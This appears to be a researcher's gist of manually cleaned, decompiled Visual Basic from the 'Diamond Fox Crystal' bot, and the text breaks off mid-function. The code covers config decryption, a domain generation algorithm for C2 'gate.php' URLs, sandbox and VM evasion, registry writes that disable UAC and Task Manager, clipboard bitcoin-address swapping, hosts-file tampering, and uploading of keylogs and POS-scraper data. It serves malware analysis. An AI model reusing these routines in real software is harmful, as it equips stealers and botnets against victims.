-
-
Save hasherezade/79de1509c8565ec7496cd554092df6f8 to your computer and use it in GitHub Desktop.
Diamond Fox Crystal, main module
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
'cleaned version of the decrypting function from Module1.vb | |
Public Sub decrypt(str1_arg, str2_arg) '406ABC | |
'Data Table: 401634 | |
Dim s2_bound As Long | |
Dim i1 As Integer | |
Dim i1 As Long | |
Dim k1 As Long | |
On Error Resume Next | |
str1 = StrConv(str1_arg, &H80, 0) | |
str2 = StrConv(str2_arg, &H80, 0) | |
s2_bound = UBound(str2, 1) | |
For index1 = 0 To &HFF: _indx = index1 'Long | |
karr(_indx ) = CInt(_indx ) | |
Next index1 'Long | |
For var_F4 = &H100 To &H11D: _indx = var_F4 'Long | |
karr(_indx ) = CInt(_indx Xor &H100) | |
Next var_F4 'Long | |
For var_FC = 1 To 6: _indx = var_FC 'Long | |
karr((_indx + &HF9)) = CInt(str2((s2_bound - _indx ))) | |
karr((_indx - 1)) = CInt(str2((_indx - 1))) Xor (255 - CInt(str2((s2_bound - _indx )))) | |
Next var_FC 'Long | |
i1 = 0 | |
k1 = 0 | |
For index = 0 To UBound(str1, 1): _indx = index 'Long | |
If (0 > s2_bound) Then | |
j1 = 0 | |
End If | |
If ((k1 > &H11D) And (i1 = 0)) Then | |
k1 = 0 | |
i1 = Not(i1) | |
End If | |
If ((k1 > &H11D) And (i1 = &HFF)) Then | |
k1 = 5 | |
i1 = Not(i1) | |
End If | |
str1(_indx) = CByte(CInt(str1(_indx)) Xor karr(k1) Xor CInt(str2(j1))) | |
j1 = (j1 + 1) | |
k1 = (k1 + 1) | |
Next index 'Long | |
loc_406AB2: result = CStr(StrConv(str1, &H40, 0)) | |
loc_406ABA: Exit Sub | |
End Sub |
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
'cleaned version of the DGA from Module1.vb | |
Public Sub domain_generate(arg_C) '407084 | |
'Data Table: 401634 | |
Dim var_BC As Double | |
Dim var_AC As Long | |
Dim var_A8 As Double | |
Dim vDay As Single | |
Dim vMonth As Single | |
Dim vYear As Single | |
Dim arg_2008 As Variant | |
Dim var_9C As Long | |
On Error Resume Next | |
baseStr = Me(92) & Me(124) | |
var_BC = CDate(DateValue(Me(120))) | |
var_AC = CLng((DateValue(CStr(Now)) - CDate(var_BC))) | |
If (var_AC < 0) Then | |
Exit Sub | |
End | |
End If | |
var_A8 = CDate((var_BC + CDbl((var_AC - (var_AC Mod Me(116)))))) | |
vDay = CDbl(Day(CDate(CDate((var_A8 + CDbl(arg_C)))))) | |
vMonth = CDbl(Month(CDate(CDate((var_A8 + CDbl(arg_C)))))) | |
vYear = CDbl(Year(CDate(CDate((var_A8 + CDbl(arg_C)))))) | |
arg_2008 = Split(Me(148), "|", -1, 0) | |
ext = arg_2008((CLng(vMonth) Xor CLng(vDay) Mod UBound(arg_2008, 1))) | |
var_9C = (((CLng(vYear) And &HFF00) / &H100) * CLng((vDay * Tan(CDbl((CLng(vYear) And &HFF))))) Xor CLng(Cos((vMonth * CDbl(&HA))))) | |
var_9C = Abs(var_9C) | |
If CBool((var_9C Mod 2)) Then | |
var_9C = var_9C Xor (CLng(vYear) / CLng((vMonth * vDay))) | |
End If | |
For var_11C = 1 To Me(108): var_C4 = var_11C 'Long | |
domain_name = domain_name & Mid$(baseStr, Abs((((var_9C * var_C4 Xor CLng((CDbl(var_9C) / CDbl(2)))) Mod Len(baseStr)) - Len(baseStr))), 1) | |
Next var_11C 'Long | |
domain_name = "http://" & LCase$(domain_name & "." & ext) & "/gate.php" | |
Exit Sub | |
End Sub |
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
'Object: Module1 | |
'(cleaned manually) | |
Public Sub main | |
'Data Table: 401634 | |
Dim MemVar_40B3A4 As Global | |
Dim var_A8 As String | |
Dim var_94 As String | |
Dim var_118 As Long | |
Dim var_11C As Long | |
Dim var_F8 As Integer | |
Dim var_144 As String | |
Dim var_98 As String | |
loc_4096D4: On Error Resume Next | |
loc_4096E4: var_90 = MemVar_40B3A4.App | |
loc_4096EC: App.TaskVisible = False | |
loc_40970A: GetModuleFileName(0, var_8C, &HFF) | |
loc_409743: var_94 = var_98 | |
loc_40974E: var_98 = Replace(var_94, vbNullString, 0, 1, -1, 0) | |
loc_409757: var_8C = var_94 | |
loc_40975D: Me(88) = var_98 | |
loc_409768: fetch_logical_disks(StrConv(var_98, vbUnicode)) | |
loc_409787: If Not((Len(Proc_0_40_40628C("L!NK")) <> 0)) Then | |
loc_4097A1: Me.Global.LoadResData "L!NK", "1", var_C8 | |
loc_4097D6: If Not((Len(CStr(StrConv(var_C8, &H40, 0))) <> 0)) Then | |
loc_40982E: var_88 = CStr(Split(file_binary_open(Me(88)), CVar(String$(&H16, "-")), -1, 0)(1)) | |
loc_409845: End If | |
loc_409847: End If | |
loc_40985F: PARAMS_STORAGE = decrypt(var_88, Proc_0_19_404CD8(var_88)) | |
loc_409877: If Not((Len(PARAMS_STORAGE) <> 0)) Then | |
loc_40987C: End | |
loc_40987E: End If | |
loc_409897: If CBool(load_param(7, 0)) Then | |
loc_4098A4: check_sandbox_dll(1) | |
loc_4098A9: End If | |
loc_4098C2: If CBool(load_param(8, 0)) Then | |
loc_4098CF: check_sandbox_dll(3) | |
loc_4098D4: End If | |
loc_4098ED: If CBool(load_param(6, 0)) Then | |
loc_4098FA: check_sandbox_dll(5) | |
loc_4098FF: End If | |
loc_409918: If CBool(load_param(9, 0)) Then | |
loc_409925: check_volume_serials(1) | |
loc_40992A: End If | |
loc_40993B: var_94 = load_param(&HA, 0) | |
loc_409943: If CBool(var_94) Then | |
loc_409948: Proc_0_2_404004(var_94) | |
loc_40994D: End If | |
loc_409966: If CBool(load_param(&HB)) Then | |
loc_409973: check_sandbox_dll(2) | |
loc_409978: End If | |
loc_409991: If CBool(load_param(&HC, 0)) Then | |
loc_40999E: check_volume_serials(2) | |
loc_4099A3: End If | |
loc_4099BC: If CBool(load_param(&HD, 0)) Then | |
loc_4099C9: check_volume_serials(3) | |
loc_4099CE: End If | |
loc_4099E7: If CBool(load_param(&HE, 0)) Then | |
loc_4099EC: delay_execution(0) | |
loc_4099F1: End If | |
loc_409A0A: If CBool(load_param(&H12)) Then | |
loc_409A17: check_sandbox_dll(4) | |
loc_409A1C: End If | |
loc_409A36: Me(92) = base64_decode(load_param(3, 0)) | |
loc_409A46: var_118 = Me(104) | |
loc_409A5D: var_118(28) = load_param(&H15, &HFF) | |
loc_409A79: var_118(32) = load_param(&H16, &HFF) | |
loc_409A95: var_118(40) = load_param(&H24, &HFF) | |
loc_409AB3: var_118(58) = CBool(load_param(&H1A, 0)) | |
loc_409AC7: init_globals(0, 0) | |
loc_409ADA: var_90 = Me.Global.App | |
loc_409AF7: If (App.EXEName = MY_APPNAME) Then | |
loc_409B08: If (MY_DIR = Me(40)) Then | |
loc_409B17: FileCopy Me(88), MY_APPNAME | |
loc_409B23: shell_execute(MY_APPNAME) | |
loc_409B2A: End | |
loc_409B2F: Else | |
loc_409B3D: If (Me(88) = MY_APPNAME) Then | |
loc_409B47: var_11C = Me(104) | |
loc_409B5E: var_11C(16) = load_param(0, &HFF) | |
loc_409B7B: var_11C(0) = CLng(load_param(1, &HFF)) | |
loc_409B97: var_11C(20) = load_param(2, &HFF) | |
loc_409BB3: var_11C(24) = load_param(4, &HFF) | |
loc_409BCF: var_11C(36) = load_param(5, &HFF) | |
loc_409BED: var_11C(48) = CBool(load_param(&H17, 0)) | |
loc_409C0B: var_11C(50) = CBool(load_param(&H18, 0)) | |
loc_409C29: var_11C(52) = CBool(load_param(&H19, 0)) | |
loc_409C47: var_11C(56) = CBool(load_param(&H22, 0)) | |
loc_409C65: var_11C(54) = CBool(load_param(&H21, 0)) | |
loc_409C83: var_11C(60) = CBool(load_param(&H13, 0)) | |
loc_409CA1: var_11C(62) = CBool(load_param(&H1D, 0)) | |
loc_409CBF: var_11C(66) = CBool(load_param(&H20, 0)) | |
loc_409CCE: var_11C = 0 | |
loc_409CDB: var_94 = Me(92) | |
loc_409CE9: CreateMutex(0, 1, var_94) | |
loc_409D05: Set var_90 = Err() | |
loc_409D0B: Call {A4C466B8-499F-101B-BB7800AA00383CBB}.Method_Proc_0_0_40A064C (var_114, StrConv(Me(92), vbUnicode), var_94) | |
loc_409D1C: If (var_114 = &HB7) Then | |
loc_409D21: End | |
loc_409D23: End If | |
loc_409D2F: SetAttr Me(88), 6 | |
loc_409D40: SetAttr MY_DIR, 6 | |
loc_409D5E: If CBool(load_param(&H14, 0, var_11C)) Then | |
loc_409D63: Proc_0_10_40655C(var_11C) | |
loc_409D6F: If Proc_0_30_4060D8(0) Then | |
loc_409D8C: modify_bot_install("1", 0) | |
loc_409D94: End If | |
loc_409D96: End If | |
loc_409D9F: If UnknownFunc(&HFF) Then | |
loc_409DBB: If CBool(load_param(&H10, 0)) Then | |
loc_409DD2: disable_tskmgr_regtools("1", "1") | |
loc_409DDE: End If | |
loc_409DF7: If CBool(load_param(&H11, 0)) Then | |
loc_409E0E: disable_tskmgr_regtools("0", "1") | |
loc_409E1A: End If | |
loc_409E21: Set var_124 = WSCRIPT_OBJ | |
loc_409E27: var_A8 = "HKLM\Software\Microsoft\Security Center\UACDisableNotify" | |
loc_409E2D: var_F8 = 0 | |
loc_409E33: var_144 = "REG_DWORD" | |
loc_409E3C: Call var_124.RegWrite | |
loc_409E44: var_A8 = "HKLM\Software\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA" | |
loc_409E4A: var_F8 = 0 | |
loc_409E50: var_144 = "REG_DWORD" | |
loc_409E59: Call var_124.RegWrite | |
loc_409E63: Set var_124 = Nothing | |
loc_409E83: If (CBool(load_param(&H1E, 0, var_144, var_F8, var_A8)) = 0) Then | |
loc_409E98: write_to_file(OFF_C, 0, var_144) | |
loc_409EA0: End If | |
loc_409EA5: Else | |
loc_409EC0: If CBool(load_param(&HF, 0, var_F8)) Then | |
loc_409EC5: Proc_0_20_4054D4(var_A8) | |
loc_409ECA: End If | |
loc_409EDC: write_to_file(OFF_C, 0) | |
loc_409EE4: End If | |
loc_409EFF: If CBool(load_param(&H23, 0)) Then | |
loc_409F04: Proc_0_8_405EC0(0) | |
loc_409F09: End If | |
loc_409F22: If CBool(load_param(&H1F)) Then | |
loc_409F27: Proc_0_7_404894(0) | |
loc_409F2C: End If | |
loc_409F33: make_persistent(0) | |
loc_409F5F: If (get_attribute1(POS_PATH) Or (CBool(load_param(&H1C, 0)) = &HFF)) Then | |
loc_409F66: Me(168) = &HFF | |
loc_409F6B: End If | |
loc_409F7A: fingerprint_system(0) | |
loc_409F84: Proc_0_10_40655C() | |
loc_409F95: If get_attribute1(LOGNAME) Then | |
loc_409F9A: Proc_0_32_4051F0() | |
loc_409FA2: Else | |
loc_409FBD: If CBool(load_param(&H1B)) Then | |
loc_409FC2: Proc_0_31_4046A4(0) | |
loc_409FC7: End If | |
loc_409FC9: End If | |
loc_409FD2: If Me(170) Then | |
loc_409FDC: var_94 = 0 | |
loc_409FEA: Proc_0_29_4059BC(&HB) | |
loc_409FF2: End If | |
loc_409FF4: Proc_0_30_4060D8(var_94) | |
loc_409FF9: ' Referenced from: 40A010 | |
loc_409FFD: If &HFF Then | |
loc_40A002: Proc_0_1_4087AC() | |
loc_40A009: DoEvents() | |
loc_40A010: GoTo loc_409FF9 | |
loc_40A013: End If | |
loc_40A013: End If | |
loc_40A013: End If | |
loc_40A018: Else | |
loc_40A031: MkDir Me(52) & Me(144) & "\" | |
loc_40A057: modify_bot_install("1", &HFF) | |
loc_40A05F: End If | |
loc_40A063: Exit Sub | |
End Sub | |
Public Sub Proc_0_1_4087AC | |
'Data Table: 401634 | |
Dim MemVar_402104.global_0 As Long | |
Dim var_90 As String | |
Dim MemVar_402104.global_20 As Long | |
Dim clipboard As Clipboard | |
Dim MemVar_402104.global_16 As Long | |
Dim MemVar_402104.global_4 As Long | |
Dim MemVar_402104.global_8 As Long | |
Dim MemVar_402104.global_12 As Long | |
Dim MemVar_402104.global_24 As Long | |
loc_40837C: On Error Resume Next | |
loc_408394: MemVar_402104.global_0 = (MemVar_402104.global_0 + 1) | |
loc_4083A7: If (MemVar_402104.global_0 = Me(104)) Then | |
loc_4083AC: cnc_post_and_read(MemVar_402104.global_0) | |
loc_4083BE: If Not(get_attribute1(OFF_C)) Then | |
loc_4083D3: var_88 = MY_DOMAIN & "?u=" & "1" | |
loc_4083E5: UnknownFunc(var_88) | |
loc_408409: var_8C = process_data(var_88, &HFF, 0) | |
loc_408418: var_90 = file_binary_open(HOSTS_PATH, StrConv(var_88, vbUnicode)) | |
loc_408423: If (var_90 <> var_8C) Then | |
loc_408430: write_to_file(HOSTS_PATH, var_8C) | |
loc_408435: End If | |
loc_408437: End If | |
loc_40844E: If (MemVar_402104.global_20 <> FileLen(KEYS_C)) Then | |
loc_408462: MemVar_402104.global_20 = FileLen(KEYS_C) | |
loc_408488: post_content(KEYS_C, Proc_0_49_404F40(7, MemVar_402104.global_20)) | |
loc_408494: End If | |
loc_4084A2: MemVar_402104.global_0 = 0 | |
loc_4084A5: End If | |
loc_4084AE: Sleep(&H64) | |
loc_4084C1: If (Len(Me(140)) = &H22) Then | |
loc_4084DE: Me.Global.Clipboard.GetText var_B4 | |
loc_4084E6: var_A0 = var_90 | |
loc_4084F8: If (var_A0 <> Me(140)) Then | |
loc_408513: If ((AscW(var_A0) = &H31) And (Len(var_A0) = &H22)) Then | |
loc_408529: Set clipboard = Me.Global.Clipboard | |
loc_408531: clipboard.Clear | |
loc_408544: clipboard.SetText Me(140), var_B4 | |
loc_40854D: Set clipboard = Nothing | |
loc_408551: End If | |
loc_408553: End If | |
loc_408555: End If | |
loc_40855E: Sleep(&H64) | |
loc_40856A: If Me(164) Then | |
loc_408582: MemVar_402104.global_16 = (MemVar_402104.global_16 + 1) | |
loc_408595: If (MemVar_402104.global_16 = &H1E) Then | |
loc_40859A: Proc_0_42_408E68(MemVar_402104.global_16, var_90, MemVar_402104.global_0) | |
loc_4085AB: MemVar_402104.global_16 = 0 | |
loc_4085AE: End If | |
loc_4085B0: End If | |
loc_4085B9: Sleep(&H64) | |
loc_4085C5: If Me(166) Then | |
loc_4085DD: MemVar_402104.global_4 = (MemVar_402104.global_4 + 1) | |
loc_4085F0: If (MemVar_402104.global_4 = &H1E) Then | |
loc_408608: Proc_0_29_4059BC(6, 0, MemVar_402104.global_4) | |
loc_40861C: MemVar_402104.global_4 = 0 | |
loc_40861F: End If | |
loc_408621: End If | |
loc_40862A: Sleep(&H64) | |
loc_408636: If Me(170) Then | |
loc_40864E: MemVar_402104.global_8 = (MemVar_402104.global_8 + 1) | |
loc_408661: If (MemVar_402104.global_8 = &H1E) Then | |
loc_40866B: make_persistent(&HFF, MemVar_402104.global_8, MemVar_402104.global_4) | |
loc_40867C: MemVar_402104.global_8 = 0 | |
loc_40867F: End If | |
loc_408681: End If | |
loc_40868A: Sleep(&H64) | |
loc_408699: If (Me(168) = &HFF) Then | |
loc_4086AB: If (get_attribute1(POS_PATH, MemVar_402104.global_8, MemVar_402104.global_16) = &HFF) Then | |
loc_4086C3: MemVar_402104.global_12 = (MemVar_402104.global_12 + 1) | |
loc_4086D6: If (MemVar_402104.global_12 = &H1A4) Then | |
loc_4086E0: kill_task(POS_EXE, MemVar_402104.global_12) | |
loc_4086FA: If (MemVar_402104.global_24 <> FileLen(OUTPUT_TXT)) Then | |
loc_40870E: MemVar_402104.global_24 = FileLen(OUTPUT_TXT) | |
loc_408734: post_content(OUTPUT_TXT, Proc_0_49_404F40(8, MemVar_402104.global_24), 0) | |
loc_408740: End If | |
loc_408749: shell_execute(POS_PATH, 0) | |
loc_40875A: MemVar_402104.global_12 = 0 | |
loc_40875D: End If | |
loc_408762: Else | |
loc_408788: process_and_write_to_file(MY_DOMAIN & "?p=" & CStr(&HD), POS_PATH, &HFF) | |
loc_408796: End If | |
loc_408798: End If | |
loc_4087A1: Sleep(&H1F4) | |
loc_4087A8: Exit Sub | |
End Sub | |
Public Sub Proc_0_2_404004 | |
'Data Table: 401634 | |
loc_403FD4: On Error Resume Next | |
loc_403FE2: UnknownFunc(var_9C(0)) | |
loc_403FFA: If CBool((var_9C(&HB) And &H80)) Then | |
loc_403FFF: End | |
loc_404001: End If | |
loc_404003: Exit Sub | |
End Sub | |
Public Sub delay_execution | |
'Data Table: 401634 | |
loc_403C90: On Error Resume Next | |
loc_403C95: Do 'loop at: 403CBC | |
loc_403CA6: Sleep(&H1F4) | |
loc_403CBC: Loop Until Not ((GetTickCount(GetTickCount()) - GetTickCount()) < &H1F4) 'do at: 403C95 | |
loc_403CC1: Exit Sub | |
End Sub | |
Public Sub check_sandbox_dll(arg_C) '40479C | |
'Data Table: 401634 | |
Dim var_8C As Long | |
loc_4046E4: On Error Resume Next | |
loc_4046EC: var_8C = arg_C | |
loc_4046FA: If (var_8C = 1) Then | |
loc_404702: var_88 = "vboxmrxnp" | |
loc_404708: Else | |
loc_404713: If (var_8C = 2) Then | |
loc_40471B: var_88 = "SbieDll" | |
loc_404721: Else | |
loc_40472C: If (var_8C = 3) Then | |
loc_404734: var_88 = "vmGuestLib" | |
loc_40473A: Else | |
loc_404745: If (var_8C = 4) Then | |
loc_40474D: var_88 = "snxhk" | |
loc_404753: Else | |
loc_40475E: If (var_8C = 5) Then | |
loc_404766: var_88 = "pthreadVC" | |
loc_404769: End If | |
loc_404769: End If | |
loc_404769: End If | |
loc_404769: End If | |
loc_404769: End If | |
loc_404790: If (UnknownFunc(var_88 & ".dll") <> 0) Then | |
loc_404795: End | |
loc_404797: End If | |
loc_404799: Exit Sub | |
End Sub | |
Public Sub check_volume_serials(index) '4041F8 | |
'Data Table: 401634 | |
Dim _index As Long | |
loc_40418C: On Error Resume Next | |
loc_404194: _index = index | |
loc_4041A2: If (_index = 1) Then | |
loc_4041AA: var_88 = "AC79B241" | |
loc_4041B0: Else | |
loc_4041BB: If (_index = 2) Then | |
loc_4041C3: var_88 = "70144646" | |
loc_4041C9: Else | |
loc_4041D4: If (_index = 3) Then | |
loc_4041DC: var_88 = "6C78A9C3" | |
loc_4041DF: End If | |
loc_4041DF: End If | |
loc_4041DF: End If | |
loc_4041ED: If (VOL_SERIAL = var_88) Then | |
loc_4041F2: End | |
loc_4041F4: End If | |
loc_4041F6: Exit Sub | |
End Sub | |
Public Sub disable_tskmgr_regtools(arg_C) '404294 | |
'Data Table: 401634 | |
Dim var_A0 As Variant | |
Dim var_D0 As String | |
loc_404230: On Error Resume Next | |
loc_40423D: If (arg_C = "1") Then | |
loc_404245: var_88 = "RegistryTools" | |
loc_40424B: Else | |
loc_404250: var_88 = "TaskMgr" | |
loc_404253: End If | |
loc_40426A: var_A0 = CVar("HKCU" & "\Software\Microsoft\Windows\CurrentVersion\Policies\System\Disable" & var_88) 'String | |
loc_404275: var_D0 = "REG_DWORD" | |
loc_404280: Call MemVar_402104.RegWrite | |
loc_404292: Exit Sub | |
End Sub | |
Public Sub Proc_0_7_404894 | |
'Data Table: 401634 | |
loc_4047DC: On Error Resume Next | |
loc_4047EC: kill_task("Chrome.exe") | |
loc_404801: kill_task("firefox.exe") | |
loc_40483F: Proc_0_14_403F14(Environ$("LOCALAPPDATA") & "\Google\Chrome\User Data") | |
loc_404868: Proc_0_14_403F14(APPDATA_DIR & "Mozilla\Firefox\Profiles", &HFF) | |
loc_404885: Kill CVar(APPDATA_DIR & "Mozilla\Firefox\Profiles.ini") | |
loc_404892: Exit Sub | |
End Sub | |
Public Sub Proc_0_8_405EC0 | |
'Data Table: 401634 | |
loc_405D80: On Error Resume Next | |
loc_405D92: var_A0(0) = APPDATA_DIR | |
loc_405DA2: var_A0(1) = TEMP_DIR | |
loc_405DB2: var_A0(2) = Me(40) | |
loc_405DBE: kill_task("wscript.exe") | |
loc_405DD5: For var_B8 = 0 To 2: var_AC = var_B8 'Long | |
loc_405DED: LateMemCallLdVar | |
loc_405DF5: CAdVar | |
loc_405E08: CAdVar | |
loc_405E14: For Each var_A8 In MemVar_402104.Files | |
loc_405E63: If CBool(InStr(1, var_A8.Name, ".exe", 0) Or InStr(1, var_A8.Name, ".vbs", 0)) Then | |
loc_405E6D: Sleep(&H1F4) | |
loc_405E8A: Kill CVar(var_A0(var_AC)) & var_A8.Name | |
loc_405E96: End If | |
loc_405E9D: Next | |
loc_405EA8: Next var_B8 'Long | |
loc_405EB1: Set var_88 = Nothing | |
loc_405EB9: Set var_A8 = Nothing | |
loc_405EBF: Exit Sub | |
End Sub | |
Public Sub Proc_0_9_4040BC | |
'Data Table: 401634 | |
loc_40406B: If Not(get_attribute1(OFF_C)) Then | |
loc_404075: var_88 = "&x=1" | |
loc_404078: End If | |
loc_404082: If get_attribute1(POS_PATH) Then | |
loc_404093: var_88 = var_88 & "&y=1" | |
loc_404099: End If | |
loc_4040A3: If get_attribute1(LOGNAME) Then | |
loc_4040B4: var_88 = var_88 & "&z=1" | |
loc_4040BA: End If | |
loc_4040BA: Exit Sub | |
End Sub | |
Public Sub Proc_0_10_40655C | |
'Data Table: 401634 | |
Dim var_94 As Long | |
Dim arg_2008 As Variant | |
loc_406350: On Error Resume Next | |
loc_406361: If (Len(Me(120)) < &HB) Then | |
loc_40636B: var_94 = Me(104) | |
loc_406382: var_94(44) = load_param(&H25, &HFF) | |
loc_40639F: var_94(4) = CLng(load_param(&H26, &HFF)) | |
loc_4063BC: var_94(8) = CLng(load_param(&H27, &HFF)) | |
loc_4063D9: var_94(12) = CLng(load_param(&H28, &HFF)) | |
loc_4063FA: For var_A8 = 0 To Me(112): var_90 = var_A8 'Long | |
loc_406411: var_A0 = 0 & domain_generate(var_90, var_A0, 0) | |
loc_406422: If (var_90 <> Me(112)) Then | |
loc_40642E: var_A0 = var_A0 & vbCrLf | |
loc_406431: End If | |
loc_406436: Next var_A8 'Long | |
loc_406460: arg_2008 = Split(var_A0, vbCrLf, -1, 0) | |
loc_40646A: var_8C = arg_2008 | |
loc_406476: Else | |
loc_40649F: arg_2008 = Split(Me(120), vbCrLf, -1, 0) | |
loc_4064A9: var_8C = arg_2008 | |
loc_4064B2: End If | |
loc_4064C5: For var_E4 = 0 To UBound(var_8C, 1): var_90 = var_E4 'Long | |
loc_4064D9: domain = Trim$(var_8C(var_90)) | |
loc_4064F3: If ((domain <> 0) And (Len(domain) > &HA)) Then | |
loc_4064F8: test_connection_microsoft(0) | |
loc_40651C: If (process_data(domain, 0) = "OK") Then | |
loc_406524: MY_DOMAIN = domain | |
loc_40652B: cnc_post_and_read(0) | |
loc_406532: Exit For | |
loc_406535: End If | |
loc_406537: End If | |
loc_40653E: Next var_E4 'Long | |
loc_406543: ' Referenced from: 406532 | |
loc_406551: If (MY_DOMAIN = 0) Then | |
loc_406556: End | |
loc_406558: End If | |
loc_40655A: Exit Sub | |
End Sub | |
Public Sub test_connection_microsoft | |
'Data Table: 401634 | |
loc_403F4C: On Error Resume Next | |
loc_403F4F: ' Referenced from: 403F8F | |
loc_403F7E: If (UnknownFunc("http://www.microsoft.com") = 0) Then | |
loc_403F88: Sleep(&H2710) | |
loc_403F8F: GoTo loc_403F4F | |
loc_403F92: End If | |
loc_403F94: Exit Sub | |
End Sub | |
Public Sub domain_generate(arg_C) '407084 | |
'Data Table: 401634 | |
Dim var_BC As Double | |
Dim var_AC As Long | |
Dim var_A8 As Double | |
Dim var_90 As Single | |
Dim var_94 As Single | |
Dim var_98 As Single | |
Dim arg_2008 As Variant | |
Dim var_9C As Long | |
loc_406E18: On Error Resume Next | |
loc_406E28: var_C0 = Me(92) & Me(124) | |
loc_406E3F: var_BC = CDate(DateValue(Me(120))) | |
loc_406E6E: var_AC = CLng((DateValue(CStr(Now)) - CDate(var_BC))) | |
loc_406E86: If (var_AC < 0) Then | |
loc_406E8B: Exit Sub | |
loc_406E8E: End | |
loc_406E90: End If | |
loc_406EAD: var_A8 = CDate((var_BC + CDbl((var_AC - (var_AC Mod Me(116)))))) | |
loc_406ECC: var_90 = CDbl(Day(CDate(CDate((var_A8 + CDbl(arg_C)))))) | |
loc_406EF2: var_94 = CDbl(Month(CDate(CDate((var_A8 + CDbl(arg_C)))))) | |
loc_406F18: var_98 = CDbl(Year(CDate(CDate((var_A8 + CDbl(arg_C)))))) | |
loc_406F49: arg_2008 = Split(Me(148), "|", -1, 0) | |
loc_406F74: domain_ext = arg_2008((CLng(var_94) Xor CLng(var_90) Mod UBound(arg_2008, 1))) | |
loc_406FB6: var_9C = (((CLng(var_98) And &HFF00) / &H100) * CLng((var_90 * Tan(CDbl((CLng(var_98) And &HFF))))) Xor CLng(Cos((var_94 * CDbl(&HA))))) | |
loc_406FBF: var_9C = Abs(var_9C) | |
loc_406FCF: If CBool((var_9C Mod 2)) Then | |
loc_406FE6: var_9C = var_9C Xor (CLng(var_98) / CLng((var_94 * var_90))) | |
loc_406FE9: End If | |
loc_406FF8: For var_11C = 1 To Me(108): var_C4 = var_11C 'Long | |
loc_407039: domain_name = domain_name & Mid$(var_C0, Abs((((var_9C * var_C4 Xor CLng((CDbl(var_9C) / CDbl(2)))) Mod Len(var_C0)) - Len(var_C0))), 1) | |
loc_407047: Next var_11C 'Long | |
loc_407072: domain_name = "http://" & LCase$(domain_name & "." & domain_ext) & "/gate.php" | |
loc_407082: Exit Sub | |
End Sub | |
Public Sub get_attribute1(arg_C) '403BB4 | |
'Data Table: 401634 | |
loc_403B9C: On Error Resume Next | |
loc_403BB0: Result CBool(GetAttr(arg_C)) End Sub 'Integer | |
End Sub | |
Public Sub Proc_0_14_403F14 | |
'Data Table: 401634 | |
Dim var_86 As Integer | |
Dim var_B8 As Boolean | |
loc_403ED0: On Error Resume Next | |
loc_403EE1: LateMemCallLdVar | |
loc_403EEB: var_86 = CBool(MemVar_402104) | |
loc_403EF6: If arg_10 Then | |
loc_403F02: var_B8 = True | |
loc_403F0B: Call MemVar_402104.DeleteFolder | |
loc_403F11: End If | |
loc_403F13: Result var_B8 End Sub 'Integer | |
End Sub | |
Public Sub kill_task(arg_C) '403D28 | |
'Data Table: 401634 | |
On Error Resume Next | |
shell_execute("taskkill /IM " & LCase$(arg_C) & " /F ") | |
Exit Sub | |
End Sub | |
Public Sub decrypt(str1_arg, str2_arg) '406ABC | |
'Data Table: 401634 | |
Dim var_AC As Long | |
Dim var_B6 As Integer | |
Dim var_B0 As Long | |
Dim var_B4 As Long | |
loc_406870: On Error Resume Next | |
loc_40689C: str1 = StrConv(str1_arg, &H80, 0) | |
loc_4068CA: str2 = StrConv(str2_arg, &H80, 0) | |
loc_4068D8: var_AC = UBound(str2, 1) | |
loc_4068EA: For index1 = 0 To &HFF: _indx = index1 'Long | |
loc_4068FC: var_A0(_indx ) = CInt(_indx ) | |
loc_406902: Next index1 'Long | |
loc_406916: For var_F4 = &H100 To &H11D: _indx = var_F4 'Long | |
loc_40692F: var_A0(_indx ) = CInt(_indx Xor &H100) | |
loc_406935: Next var_F4 'Long | |
loc_406949: For var_FC = 1 To 6: _indx = var_FC 'Long | |
loc_40696B: var_A0((_indx + &HF9)) = CInt(str2((var_AC - _indx ))) | |
loc_40699E: var_A0((_indx - 1)) = CInt(str2((_indx - 1))) Xor (255 - CInt(str2((var_AC - _indx )))) | |
loc_4069A4: Next var_FC 'Long | |
loc_4069AD: var_B6 = 0 | |
loc_4069C1: var_B4 = 0 | |
loc_4069D5: For var_104 = 0 To UBound(str1, 1): _indx = var_104 'Long | |
loc_4069E4: If (0 > var_AC) Then | |
loc_4069EE: var_B0 = 0 | |
loc_4069F1: End If | |
loc_406A03: If ((var_B4 > &H11D) And (var_B6 = 0)) Then | |
loc_406A0D: var_B4 = 0 | |
loc_406A16: var_B6 = Not(var_B6) | |
loc_406A19: End If | |
loc_406A2B: If ((var_B4 > &H11D) And (var_B6 = &HFF)) Then | |
loc_406A35: var_B4 = 5 | |
loc_406A3E: var_B6 = Not(var_B6) | |
loc_406A41: End If | |
loc_406A6A: str1(_indx) = CByte(CInt(str1(_indx)) Xor var_A0(var_B4) Xor CInt(str2(var_B0))) | |
loc_406A77: var_B0 = (var_B0 + 1) | |
loc_406A85: var_B4 = (var_B4 + 1) | |
loc_406A8D: Next var_104 'Long | |
loc_406AB2: result = CStr(StrConv(str1, &H40, 0)) | |
loc_406ABA: Exit Sub | |
End Sub | |
Public Sub base64_decode(arg_C) '404AA8 | |
'Data Table: 401634 | |
Dim var_B8 As Variant | |
loc_4049E8: On Error Resume Next | |
loc_404A0D: CAdVar | |
loc_404A1B: var_B8 = "b64" | |
loc_404A24: LateMemCallLdVar | |
loc_404A2C: CAdVar | |
loc_404A3A: Set var_CC = CreateObject(get_object_type(4), 0) | |
loc_404A49: var_CC.DataType = "bin.base64" | |
loc_404A59: var_CC.Text = CVar(arg_C) | |
loc_404A82: var_88 = CStr(StrConv(var_CC.nodeTypedValue, &H40, 0)) | |
loc_404A90: Set var_CC = Nothing | |
loc_404A98: Set var_90 = Nothing | |
loc_404AA0: Set var_8C = Nothing | |
loc_404AA6: Exit Sub | |
End Sub | |
Public Sub Proc_0_18_405D30(arg_C) '405D30 | |
'Data Table: 401634 | |
Dim var_9C As Long | |
Dim rnd As Integer | |
Dim var_98 As Double | |
loc_405BBC: On Error Resume Next | |
loc_405BC4: Randomize(rnd) | |
loc_405BE1: var_9C = CLng(Int(((Rnd(rnd) * CDbl(&H63)) + CDbl(1)))) | |
loc_405BF7: For var_C8 = 1 To Len(Me(124)): var_A0 = var_C8 'Long | |
